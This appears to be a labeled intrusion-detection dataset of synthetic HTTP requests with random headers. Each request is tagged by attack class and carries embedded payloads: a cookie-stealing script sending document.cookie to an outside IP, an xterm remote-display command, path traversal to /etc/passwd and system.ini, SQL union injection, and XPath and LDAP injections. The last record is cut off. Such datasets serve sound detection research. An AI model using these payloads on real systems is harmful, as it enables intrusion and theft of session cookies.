GET /tsHutua3h4htssanrni/oeGhTY.html?reA=c%24don+r%28Uxan+r0is+V&smnh0tet=n%25tc&arrzO7n9erp=zceanetYt1a&qikli9rfia=%3Cobject+classid++++%3D%22++clsid%3A...+%22++++codebase+++%3D+++%22+++++javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F112.71.134.161%2Flles.php%27%2Bdocument.cookie%29%3B%5D%22+++%3E&Cphd=kw0mX&nvEaaebl=921184&QueraptnpaH=to&dycsR=fxW&iBtB4=epie%3Coradnu+ovbscript&wd=LtpgEduFSLg&ESeOrm=rcuzj&httpzUEHLzL=Zlosioruean6o&ftecn=ncyosot1chc7biL&idzsd1esteindti=tncmd HTTP/1.0
Host: www.1ereh9awg.uk
Connection: keep-alive
Accept: image/*;q=0.1, image/*;q=0.5, text/*
Accept-Charset: iso-10646-ucs-2;q=0.9, cp-932, koi8-r;q=0.4, euc-cn, x-mac-chinesesimp;q=0.7
Accept-Encoding: deflate, gzip;q=0.0, identity, compress
Accept-Language: ttesni-tuDm8B, 01uwr-eFeouu9o;q=0.9, rxqfg-ss9w, pM9n-NkiemA, dOija-cdpn3ee
Cache-Control: only-if-cached
Client-ip: 66.107.218.203
Cookie: 5Eyigdriltexre=h&t;shhfnp=orc;iiadmnoenKeeb=ssamrAhdocumentht;t4hem5eroent=30;sa=eNanD3rejYK;qini=651755667
Cookie2: $Version="8"
Date: Wed, 04 Oct 06 05:35:03 UTC
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: ctya@sr6jtHsrss.cz
If-Modified-Since: Wed, 21 Jan 04 24:50:29 UTC
If-Unmodified-Since: Wed, 05 Nov 08 13:22:42 CET
If-Match: "qBlIDkEWsqd1WmopfuOI"
If-None-Match: "HlvHJeL3e74XTBHap"
If-Range: *
Max-Forwards: 28
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: NTLM eXJzdHlpaGNzZWRnbmNocmk4am00YW51SG9mcmVrcmVybXJy
Range: 388869-790680,430-,-04157
Referer: http://www.eanpthtd.st/tuyip72s/qrsyorf.js
TE: deflate;q=0.8
Trailer: If-Unmodified-Since
User-Agent: wcnidd (eyGmLPK)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 4.1 www.eusEj.gif, FTP/9.9 www.greMyen.js
Transfer-Encoding: identity
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 964 245.225.40.21:93731 "csa6ao3oxtd9hnfoert" "Tue, 16 Nov 04 02:10:40 CET"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47055
Start - Id: 49497
class: XPathInjection
GET /hz57vE3AVa/sminohgMstgeeegyr/dRlR_Nhwm/b2B3g/tu/ysfdoe/4ada8df.cgi?fm5t8Aacnylsnd=a+positionsh0icy9&HwMuKgsef=0488545&Coi5say3=1588+++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++8749%3D&NBallRL1Em=3832&1ssesefthatt=4&i2pi4o6=reoSu&Esne=tgbodynlterEgYja&has6haEbRhr3Ea=+b%3D&rseeyeo=4613&8hwootdcsryeii=yyuiugroup+byh%3Bselectxp_oeoi4null&dNoneDt=486209&osociore0eee=l%3Dtu0%5De%3A%40+oheEnb3e HTTP/1.1
Host: www.uoatiiiog.it
Connection: tkicf
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: ftsas-enlsfeom, l-ydtr8eg, i-SoEfih;q=0.3
Cache-Control: no-transform
Client-ip: 223.242.155.63
Cookie: hANTYB=aos3tDloe;yNos3ahnt6v8eli=035_B3QVO5Z0;cmdmLfaVlibgwherereplace=2200561231;@qdCOunc@2Dw=yz
Cookie2: $Version="238"
Date: Sat, 16 May 09 01:03:01 GMT
ETag: "Pcv9xX0C1jYW.QIrMfv"
Expect: cvQree=1el3
From: amlp2vta@vfese.gov
If-Modified-Since: Mon, 04 Jan 10 18:28:22 CET
If-Unmodified-Since: Sun, 23 Jul 06 20:11:33 GMT
If-Match: "w7U_LuQnnG@u_ZoyO"
If-None-Match: *
If-Range: Thu, 07 Jul 05 21:22:05 GMT
Max-Forwards: 377
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM c05hSHR6bmFzbHJUbjhibGVkZGE5d3A1bmR0YWFhM3R0
Authorization: urdmey er4o=atlis
Range: 2-801463,7709-,5-5829
Referer: /aam1d5n/stlmnio/gfoHaaoa.tiff
TE: gzip;q=0.5
Trailer: Connection
User-Agent: zpin1i/7.1
UA-CPU: 68000
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 527x1451
Via: HTTP/4.7 www.Notfexw.html
Transfer-Encoding: deflate
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 410 www.st6tgso.css "mdhmtyeir8nd" "Tue, 20 Jul 04 04:31:53 CET"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49497
Start - Id: 48236
class: XSS
PUT /dVAtaaxduAXgDiyzO/djmGDupositioniallgrm/sneeoasrahzs4hw/IreltJ3ajgDmcqog/oi/sg6ON6/eontbsen/faaebrFw/nbhr2IuuGIwZ/cVzBSu_HnG2P0/mOT0LDg1V/egbaqrirdeUnlxmPird.js? HTTP/1.0
Content-Length: 116
Content-Language: gto,phdptrhi
Content-Encoding: compress
Content-Location: /tsutr/jatesazz.jsp
Content-MD5: Y3lhcnRiTWRqMmxlRXJ2Nw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Feb 05 20:59:02 GMT
Last-Modified: Mon, 22 May 06 07:56:17 GMT
Host: www.barqpqsnyh.org
Connection: keep-alive
Accept: image/*, image/png, text/plain
Accept-Charset: iso-8859-4
Accept-Encoding: 
Accept-Language: tWe24a-o;q=0.5, eakTxE-00eeiE, iEphinU-h, 3waYTnl-rn9;q=0.7, TtNbp8Q-o;q=0.8
Cache-Control: no-store
Client-ip: 150.52.52.158
Cookie: kieholc=93287217;ERo=<div   onmouseover   ="  [alert('tG');] "    >;giavkceyi=53147650;lststs1eMatve=15;ietoeoeonsoen=ds< r0efsnRr5h=er);ai=ye
Cookie2: $Version="6"
Date: Sun, 02 Dec 07 18:40:14 UTC
ETag: W/"O4eyEimQ9o3CUxc2YQhb"
Expect: 100-continue
From: oowkt3et@ea9hioiot.be
If-Modified-Since: Mon, 14 Jul 08 06:13:28 CET
If-Unmodified-Since: Mon, 15 Nov 04 12:37:16 UTC
If-Match: *
If-None-Match: "EclbKi.hD8uJ_Gm"
If-Range: Mon, 17 Nov 08 04:48:38 UTC
Max-Forwards: 995
MIME-Version: 3.7
Pragma: eol=ogteni95
Proxy-Authorization: o9ieam tglf6r=lilay
Authorization: Basic ZXNlZzdwbWg6ZVRrcXRsaA==
Range: -594,-4310,59019-33
Referer: /Aauin/bpew5/oaifu.swf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.9 (Machintosh; U; PPC 6.0; ei-ee; rv:9.3.5) Gecko/75735554
UA-CPU: 68000
UA-Disp: 0382,578,16
UA-Color: color32
UA-Pixels: 582x431
Via: IIae/4.2 www.8yhIn.html
Transfer-Encoding: identity
Upgrade: eoa/9.6
Warning: 321 244.248.253.181 "iesqnoutyAsh" "Fri, 04 Feb 05 13:45:57 CET"
X-Serial-Number: 793433345048
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~

7gtlx6tswhghexb=fse&c7E=7337&edidaGdcesH6et=5101532&s2tcbYoaye8oeT=3&2tleru31bp=Ua&ecT8erdo8jhEq=83E|eyhasy&ca R

End - Id: 48236
Start - Id: 37171
class: LdapInjection
GET /a_h.v_rshHK8/smodeep/uUWA1NEu0kfy@71aXql0/yB/.5.jpeg?.lDtelnetwgetz=edpwh%29%28++%7C%281sehr%3D*%29&nlosthboela=15991780&tciBnvas=4rmawcrWdeefr&lokarTcin87ru=s%3D3acu HTTP/1.1
Host: 88.65.148.33
Connection: keep-alive
Accept: text/plain, application/*
Accept-Charset: iso-8859-9;q=0.5
Accept-Encoding: gzip
Accept-Language: afdtiu-ht, tystcdn-itftIsr, mzetel-rot, etnsn-sn1;q=0.9
Cache-Control: enzAs='ieaad'
Client-ip: 188.238.110.194
Cookie: dNf5CwsamJr=49036;hm0r=d5wFf;_Ngzd04LtD=708727;aL6N=em?;aeReivf1iotdw9e=2245326;eiseaspvit=admin2o nu bmailtcr>ee-~rsg
Cookie2: $Version="45"
Date: Fri, 09 Feb 07 17:47:33 GMT
ETag: "cmhDI5J8iYPu8ZT-g7OW"
Expect: eGqmep=9at5aun;pdiah=wrena
From: aedk@htQLhAndaa.gov
If-Modified-Since: Fri, 24 Jul 09 22:57:41 GMT
If-Unmodified-Since: Wed, 21 Jan 04 11:26:42 UTC
If-Match: "gNHabTFCB4ceHSJ1f9c1"
If-None-Match: "WQ_-1Hx2FOdPcyy03L"
If-Range: "Z4G3T@eRECE7Qfy"
Max-Forwards: 2
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic YW90bmE6ZW16MnBhbg==
Authorization: Digest nonce
Range: 0-
Referer: /ebassmw/Ghsse/trxeoM/uiary/yht2s8tV.exe
TE: deflate,trailers
Trailer: Via
User-Agent: dR48A2VZ http://www.coiroq.st
UA-CPU: StrongARM
UA-Disp: 303,353,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5776x2501
Via: 5.1 www.ne2sm9oh.html, 6.5 www.ngxis.htm, YOsv/2.9 www.htHA.htm
Transfer-Encoding: gzip
Upgrade: Tri/4.5
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 194.226.246.19
X-Serial-Number: 6743183535814854929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37171
Start - Id: 35336
class: SqlInjection
GET /-5ZH_6JnFRs6Ez/Z.vbscriptKS2k5c7LaxK/5WuHN0Ywindow.openOUnode3qqi/kXPWrNlb/nTgaleeymql4aeoeCi/0SzpjccgFgVyQj2NmJrT/rvdH_KdDTPp6FzfdZIs/3Wt4mB3og.cgi?_ZxIHLXRiZmI=%29erdheri%2Bnm%25t&ateer=adMn%3Cnr&jAkOhtpasswinnt7R=eehnohsnius%7C&rsd2rainac=ej0o&OGW_h1or=OR+++%27ahl%27+++%3D++%27Sim%27%2B%27ple%27&j7aas=oEhoe%40+&to8bg=ylnemvmBau+ac&ioac=laM9oetisJs0a5Dt&lrapae6e=nrom+&tse3TtoEe1eou=31&0r3=%28eoqh&w7eedrn=%3D+O8 HTTP/1.1
Host: 247.231.123.152
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 85.135.241.126
Cookie: 8iaiogt5TdN=sVi?eiel;tudwtgtfntredO=d mochadm;DzexecD=:s:stdinh asEy/eahoti@;ohetgj=vle];av
Cookie2: $Version="9"
Date: Sat, 22 Mar 08 11:11:43 UTC
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: 2cs3fs@4loUnehlAe.it
If-Modified-Since: Sat, 02 Jan 10 16:15:45 GMT
If-Unmodified-Since: Thu, 22 Apr 10 14:07:38 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 15 Feb 08 23:20:46 GMT
Max-Forwards: 8
MIME-Version: 1.4
Pragma: norn4bs=Y
Proxy-Authorization: NTLM enRmOG93dDN5b3Rubk1oM29ObWVZenRCbnJibmltdFllRnQweW8wb1RuN3BoZQ==
Authorization: NTLM czhNYUllclJ0QnBzMHNhNjBzN2FyYWFPdW5laWllbHRlZWJlYXB0dGZ6bzhmbmg=
Range: 16442-228208
Referer: /yhda/1bwgw.swf
TE: trailers,deflate
Trailer: Via
User-Agent: Mozilla/5.9 (compatible; Konqueror/4.1; Linux i386; ojY5e; ceiR)
UA-CPU: StrongARM
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5578x419
Via: HTTP/7.5 211.208.223.131, 8.2 79.235.211.198, FTP/9.7 www.aaSa.shtml
Transfer-Encoding: compress
Upgrade: trno9o/8.6, tnr9dg/0.3, iet/0.3
Warning: 857 www.af1tY.jpeg "vltHuipbeAndrm" 
X-Forwarded-For: 29.33.121.207
X-Serial-Number: 9356932
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35336
Start - Id: 43634
class: OsCommanding
POST /style4mGpW/afIc8hLbr/woHn/ecuopsAkhR5cwasrp/a5aZwLa6n/zn8niaeaeouiqepeynem/Mk/t@zgWdTF/gT/rsieaa/.Hfy8b6/VVz.shtml? HTTP/1.0
Content-Length: 194
Content-Language: aig,pe
Content-Encoding: identity
Content-Location: /uelsb/ehuoXj/1ty9Dt/ItiA.cgi
Content-MD5: aGhUYVNuaUFoZ2J6c21lNA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Aug 05 04:01:35 UTC
Last-Modified: Mon, 18 Jun 07 18:35:29 CET
Host: www.rna8Acm.st
Connection: keep-alive
Accept: video/*, text/plain;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=57274
Client-ip: 74.56.238.145
Cookie: gefe9athrdn=t@Sw4O.;t6ju=%0A     xterm -display  www.alatle.com:0.0    ;uaehauinRgxA=77;ft26tyyiee=dall;ieagMrt=ac87o;ticsm3EEg8=eieeo
Cookie2: $Version="441"
Date: Mon, 02 Feb 04 08:50:43 UTC
ETag: W/"3ENj6GT@9F_u1cr@E"
Expect: 100-continue
If-Modified-Since: Wed, 04 Jul 07 13:50:42 GMT
If-Unmodified-Since: Fri, 19 Aug 05 09:18:07 UTC
If-Match: "kUZXP-sl93VGUIGZ76xI"
If-None-Match: *
If-Range: Tue, 02 Mar 10 03:58:30 CET
Max-Forwards: 4150
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: 6a3ne 0ti0hhf=Sqwtfm5o
Authorization: A3Ts aeyk=jutxlyt
Range: 28-30578,2890-
Referer: /tetTrtt/ib1io/duxpet.mpg
TE: chunked;q=0.7
Trailer: TE
User-Agent: qDleiuzfj http://www.0mDo4h.st
UA-CPU: x86
UA-Disp: 9318,8305,16
UA-OS: Win95
Via: 1.4 43.135.144.246:9, FTP/3.6 www.nei9.jpeg
Transfer-Encoding: gzip
Warning: 715 www.t2iabbtc.tiff "eagnkqCo5tdtte" "Wed, 05 Apr 06 22:22:37 CET"
X-Serial-Number: 3183555985904482173
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nteftwo25iri=698341&me8ohid4irbneM=oNeo|&icshGFjbtfe8nE=re&0oqgFR4TZmwgetv=acAt&e3Donyav1Ieh=nRVK&sh=4389644&ehwmlsrEAiherrY=r&vIvarmm=HgSedaaNmdocumentd&cvhttpbvgvh=twtyoaYsiceo&ien4=96880940

End - Id: 43634
Start - Id: 45652
class: PathTransversal
GET /oG_xWk/ixoHFJOxmlAps9G/3losNnP/exkHwBUa/sacceptselectu/ns7ocahgoaysa7/e3daeSaonoEt/sInesud/orwueu7tnn/mv5vgp6Mt_Q@f.0Qqf.pl?ss=54&aT=nJ%3D7fromJerdz%3Fdnull%25stNiys&caJe3m8KesNul2a=dvfax8mmteeform&AKYlkW1HsX=Txp_winntdocument+zo&8meaceatoeia=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&nakyestvec=tz1gR&sE=82&uoc=sxa&eaA=epBy2xMny1&en1gzrsuJssg=imochaim%29xmetae-aql8saet%2Fa&oaaip=79004028&wdtTrctettcsepu=RDS&yesns=aTsoqdef3cscrea HTTP/1.0
Host: www.Ds8e.cz
Connection: close
Accept: image/png, audio/*
Accept-Charset: iso-8859-8;q=0.0, windows-1252, x-mac-korean, cp-936, iso-8859-9;q=0.5
Accept-Encoding: 
Accept-Language: eeeCkch-rNdit2;q=0.3, 1dnd-j;q=0.3, 2anh-dm;q=0.0
Cache-Control: min-fresh=20
Client-ip: 49.59.138.232
Cookie: eohed=ccmw<wat)es;vbnd_d@=a4rrticwf;testvRu3o=hWsxskt log;style60X4IkH=39902644
Cookie2: $Version="7"
Date: Wed, 24 Jan 07 15:13:46 UTC
ETag: "@9jfyx5Jsp9gY1D-"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Wed, 03 Mar 04 19:06:46 GMT
If-Unmodified-Since: Wed, 10 Mar 10 22:57:48 CET
If-Match: *
If-None-Match: "CZjwIEyfouvKjLHbh"
If-Range: "y_@U.CcJySwlaWY9elPS"
Max-Forwards: 08
MIME-Version: 6.6
Pragma: td=acseH4
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: -32,-46611
Referer: http://www.AlTor.de/meSnnc/euarmn.swf
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: fnmOVt (n6j6AMnM; n@M1mkMCGF; nu3oVHjJdE; cx4o3I; eDc9EC)
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/9.2 www.taayee.shtml
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: 8mc5/8.9
Warning: 878 36.126.187.244:5468 "Nwnmte1bhOIhe" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45652
Start - Id: 46321
class: PathTransversal
GET /esbtvi6lh.html?aoiamooeSatgd=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.1
Host: www.aopnuaiifs.com
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.8, windows-1253;q=0.0
Accept-Encoding: 
Accept-Language: ejiHea-nzna;q=0.9, 3-eb
Cache-Control: no-transform
Client-ip: 25.14.246.74
Cookie: oriTku=ec sxt hnrkf;TR1sD=d5n5Wlbw;YCOwDv=rqlib;ey8a=5399609
Cookie2: $Version="67"
Date: Tue, 17 Feb 04 11:29:38 CET
ETag: W/"1BKOAtAn71-i0xK.ka"
Expect: 100-continue
From: sgtDwB@5isge.ch
If-Modified-Since: Fri, 16 Oct 09 18:45:29 CET
If-Unmodified-Since: Thu, 09 Apr 09 21:41:43 UTC
If-Match: "azJGIiqSel9iXHa@"
If-None-Match: "mI9f03cd5Sy3g3SZWs"
If-Range: *
Max-Forwards: 2234
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/hecitr/doeame/jelauc/aesajiHl/e5sikade.cfm
Authorization: NTLM eHNiZG5jdHJzeXZhTWR5cmh2c0djb25zQWVlaXR0ZWFyZGlFVXJweVJvZA==
Range: 595-7160,98-,4-961
Referer: /orsa.cfm
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: 49teo (es0JoI)
UA-CPU: Sparc
UA-Disp: 776,0792,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 9.9 18.229.218.182, sbc/5.8 62.111.81.18
Transfer-Encoding: deflate
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 0373535580
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46321
Start - Id: 42521
class: SqlInjection
GET /9gnzhi/yRgGlcggiR32Zn5ZtB/hevawerhSendg/vnlmptiehwwlur5Hete3/9ya.cgi?mcecegrDkj=fy&eiolBwEtw=%27++union++select++%40%40version%2C1%2C1%2C1-- HTTP/1.0
Host: www.pteAz.org
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 126.1.229.33
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="1"
Date: Tue, 23 Sep 08 04:15:59 UTC
ETag: W/"ve-pqjv9XdDtUWV2ku"
Expect: 100-continue
From: taeiimh@Ahaape.gov
If-Modified-Since: Sat, 06 Jun 09 02:07:16 UTC
If-Unmodified-Since: Tue, 09 Aug 05 14:45:43 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Jul 05 21:46:04 CET
Max-Forwards: 43
MIME-Version: 6.0
Pragma: 5b=lEen
Proxy-Authorization: NTLM NXRXZGh0ZW81bXNzbm1nYXhudm1UZGR0aWFhZmVmcGV0c2FuZWVLZXJlcnM=
Authorization: 8ehr6 GhImtA=ele8v
Range: 430-,2-8084
Referer: /cereH/tks8/anrk.php
TE: deflate,trailers,deflate;q=0.5
Trailer: Via
User-Agent: Mozilla/2.6 (Windows; U; Win 9x 2.1; fo-ia; rv:3.0.3) Gecko/18591219
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 0.4 31.250.126.26
Transfer-Encoding: identity
Upgrade: iiruhh/4.7, Tnar/9.2, osto/3.0, ouuar/8.2
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 5574945515146967020
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42521
Start - Id: 49517
class: XPathInjection
GET /fnucLu/iB8wI.zE.WK8cQG/YoW7Pc3/rjn7hnaWeeet/hNN0fnrJC@JfVg/vjTezz.-e2HV2Dm2gzX/SoATy2eTbeds1antie/iidoEn2w/lexe2bfgi2hhittx21/t4bgcIJP4mA6b8f8ATX.pl?NYWnm3dBPjv=9iframeij&hcnkaneaiRj=wnodeuzowselect+lh&vxp_gv=169+++or+1%3C+++++e3rqh%2Fdn4bte%2Faatcd%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D+++++or++++4%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&iciht=4067 HTTP/1.1
Host: 81.126.32.116
Connection: seen
Accept: video/*;q=0.9, text/*;q=0.5
Accept-Charset: iso-8859-8-i, x-mac-greek;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=4
Client-ip: 106.82.80.243
Cookie: iettce5yihow=8;ClinkRadmin=28o;teneye6hhkst=qMMaB;OdNpur_e=680405795;ricbtwser=en;snjlatt=s8e@[ai
Cookie2: $Version="988"
Date: Thu, 29 May 08 14:49:45 GMT
ETag: "c4bAi8O6ysm4iSCRBk-"
Expect: igeeah=za6rsomx;otXlia7e
From: eaatpaso@ksiwaan.org
If-Modified-Since: Wed, 21 Jun 06 05:17:34 GMT
If-Unmodified-Since: Wed, 17 Mar 10 23:13:04 CET
If-Match: "a3.ksc56FP-hu2Fy"
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest response="9BB6B27FDc09F001de66A19b5ca82987"
Range: 72-,357-,72130-42
Referer: http://hMnfsu.be/ha4omIr/gao5t/i5seOpr.nsf
TE: gzip;q=0.2,gzip
Trailer: If-Match
User-Agent: Mozilla/2.8 (compatible; MSIE 3.3; Win98; lwkctc9abe; eE0oe; Ontsnf)
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7997x438
Via: HTTP/4.1 www.iamhu.png, 5.9 www.telee.css, 1.1 www.nqaientb.html
Transfer-Encoding: compress
Upgrade: itnn/7.0, e8wien/4.6, 6sde2/3.7, niNg/1.6
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49517
Start - Id: 44861
class: PathTransversal
GET /ttuRdai/nvovapm/daaD/lhoxericNwl0t/mVkU6N18am/ix73XSJjK/iCO56Px._DnhIq/olrste6ot6oao/aT/xtz2/Rlocationm.png?d5sohhBajalNe=++e&Ckwfo=collection%28file%3A%2F%2F%2Fc%3A%2F8efA4%2FEaaazal.xml+++++%29&ih2svoren=3a2ttronanO&d2eUiicniI=eboot.inis4-te%3BtaAn%2Bxp_gtie&8doi=r1S8%40e&e@DOiakxg=sc2iYt958ili&8raohnhtrao=9564490&nin-M3stdin=he&remeerOE2=0264437933&dropi3hn_02Vjax=pZgD&I12UrlsYE=abzwbnesfr5reohra&l37dLBGJQOmE=5588934037&awn=198 HTTP/1.1
Host: www.SAenDtTis.uk
Connection: hlronk
Accept: video/quicktime, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 31.199.198.5
Cookie: 5jTEmt@-KyKinput=8ehe97
Cookie2: $Version="27"
Date: Tue, 05 Jan 10 12:59:12 UTC
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: 100-continue
From: netotmi@oanhTettwr.cz
If-Modified-Since: Wed, 25 Feb 09 05:14:43 GMT
If-Unmodified-Since: Mon, 11 Feb 08 18:20:34 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 28 Apr 06 04:30:00 UTC
Max-Forwards: 4
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: boirwt l8nta=oels3is
Authorization: NTLM b2VlbmFvbmFoc2Vpb2tVY2REcTNyaWVlRGVpc3RtbHRh
Range: 3752-,303-8,-33345
Referer: /uoneetxo/srorau/xtgprw.pdf
TE: deflate,deflate,chunked
Trailer: Date
User-Agent: Mozilla/5.9 (X11; U; Unix 3.0; h9-cw; rv:2.8.6) Gecko/26804248
UA-CPU: StrongARM
UA-Disp: 280,070,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 458x842
Via: 8.2 224.145.89.72, 4.4 www.hlijaAhh.htm, 5.1 247.212.47.152
Transfer-Encoding: compress
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 14283566548757550982
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44861
Start - Id: 45283
class: PathTransversal
GET /inq7A5FmmMuOjNY/4Tiir3Buwrgteeo/emxX2fGUXcOWkQkKhEz/lgsqK/s.DpLRI5zfd1vVvfe/7_gc.DTCV7GY0B/eRFR3w5XiPkNpassthru.html?ip2c=7218&Nau7ta=mSRNVnevYBf&iq2w3c6=hewsuSy%7CYet%3Bchaving&dndg2=fkPy7s8SU&issra=c-&RDrcp3VhO=873491&lrpetun=t-lnRDR HTTP/1.0
Host: 175.117.209.102
Connection: keep-alive
Accept: audio/x-wav, video/*;q=0.0, application/*
Accept-Charset: *
Accept-Encoding: ..\..\..\..\..\..\..\..\..\WINNT\system.ini
Accept-Language: eoechiie-enil3Ibd;q=0.0, l-Ln;q=0.1, dA7gp0-onhr, fnd9Oa-esih9
Cache-Control: only-if-cached
Client-ip: 232.98.48.14
Cookie: kcts=ewsff=lttmpmp&y;rdDsn=46;onprdelklo=jservicesor;citn9moP=6151319560
Cookie2: $Version="4"
Date: Wed, 14 May 08 16:25:27 GMT
ETag: W/"5sS.bHdpvUqWsjVo-1h"
Expect: ruRriaR=bioddtes;bsfxiao=2oktcsxn
From: d4ks@aoejS8oe.be
If-Modified-Since: Thu, 01 Nov 07 17:36:03 UTC
If-Unmodified-Since: Tue, 23 Jun 09 19:04:49 GMT
If-Match: *
If-None-Match: "0DAQ85B9ibcSs7-w"
If-Range: *
Max-Forwards: 97
Pragma: no-cache
Proxy-Authorization: NTLM dGFtbmFwdHZkcnNlMDJpUmtyZHRpRW9lb2VBN2lyemFnZW1oZQ==
Authorization: 2eehPM cybuna=ntil
Range: -3,07-8,-6
Referer: /titcepal/at6ereh/rnoygee7/eneFn/rmii.msf
TE: trailers
Trailer: TE
User-Agent: Mozilla/3.8 (Windows; U; Windows NT 8.8; dc-ny; rv:7.8.1) Gecko/03532972
UA-OS: Win9x
Via: HTTP/7.4 www.ohaeAi2a.htm:38847
Transfer-Encoding: nrdoo
Upgrade: sY7kva/6.7, wn5/7.5
Warning: 249 www.tahor3d.jpeg "da7hcghtEielneFaue" "Mon, 11 Dec 06 16:37:58 GMT"
X-Forwarded-For: 238.149.119.17
X-Serial-Number: 1947313
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45283
Start - Id: 43067
class: OsCommanding
POST /n3OSEb8GZ/3Z4nbO3r8c8Ephp/nXOcW@Dv/rO/CUSwxaiKzi7w/a3i/aasixnsnieTnc6oebNt.shtml? HTTP/1.0
Content-Length: 131
Content-Language: adkjsns,feLuf,htenheo
Content-Encoding: compress
